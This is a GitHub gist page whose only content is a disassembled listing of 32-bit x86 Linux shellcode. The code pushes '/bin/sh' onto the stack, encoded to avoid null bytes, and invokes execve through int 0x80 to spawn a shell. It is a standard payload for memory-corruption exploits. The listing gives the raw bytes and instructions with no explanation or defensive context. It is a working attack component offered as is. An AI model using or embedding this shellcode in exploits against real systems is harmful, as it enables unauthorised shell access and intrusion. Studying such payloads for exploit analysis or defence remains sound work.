Skip to content

Instantly share code, notes, and snippets.

@tsusanka
Created November 10, 2014 11:49
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tsusanka/f55fbf6ad6429473e546 to your computer and use it in GitHub Desktop.
Save tsusanka/f55fbf6ad6429473e546 to your computer and use it in GitHub Desktop.
0: b8 32 2f 73 68 mov $0x68732f32,%eax
5: c1 e8 08 shr $0x8,%eax
8: 50 push %eax
9: 68 2f 62 69 6e push $0x6e69622f
e: 89 e3 mov %esp,%ebx
10: 31 d2 xor %edx,%edx
12: 52 push %edx
13: 53 push %ebx
14: 89 e1 mov %esp,%ecx
16: 89 d0 mov %edx,%eax
18: b0 0b mov $0xb,%al
1a: cd 80 int $0x80
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment